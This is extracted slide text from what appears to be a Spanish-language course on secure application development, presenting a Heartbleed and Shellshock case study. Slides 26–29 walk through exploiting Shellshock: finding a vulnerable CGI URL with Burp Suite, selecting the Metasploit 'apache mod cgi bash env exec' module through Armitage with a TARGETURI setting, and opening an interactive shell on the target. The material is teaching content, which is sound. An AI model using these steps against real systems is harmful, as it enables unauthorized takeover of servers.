  • 24. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Vulnerabilidad Sistemas operativos m´as afectados Fuente: A Global Empirical Analysis of the Shellshock
  • 25. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Explotaci´on 1 Heartbleed 2 Shellshock Antecedentes Vulnerabilidad Explotaci´on
  • 26. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Explotaci´on Paso 1: Detectar URL vulnerable Inicia Burp Suite. Configura tu navegador web para hacer uso de Burp. Entra al sitio a analizar.
  • 27. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Explotaci´on Paso 2: Inicia Armitage Agrega la direcci´on IP del objetivo. Attacks → Find attacks.
  • 28. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Explotaci´on Paso 3: Explotar la vulnerabilidad Selecciona la vulnerabilidad apache mod cgi bash env exec Configura el siguiente par´ametro: set TARGETURI /cgi-bin/status Explota la vulnerabilidad.
  • 29. Caso de estudio No. 1: Heartbleed & Shellshock Shellshock Explotaci´on Paso 4: Toma el control del equipo Clic derecho sobre el objetivo, selecciona Shell → Interact.
  • 30. Caso de estudio No. 1: Heartbleed & Shellshock Referencias bibliogr´aficas Referencias bibliogr´aficas https://www.seguridad.unam.mx/historico/noticia/index.html- noti=1659 https://www.seguridad.unam.mx/historico/noticia/index.html- noti=1665 Desarrollo seguro de aplicaciones con criptograf´ıa Shellshock, Tudor Enache A Global Empirical Analysis of the Shellshock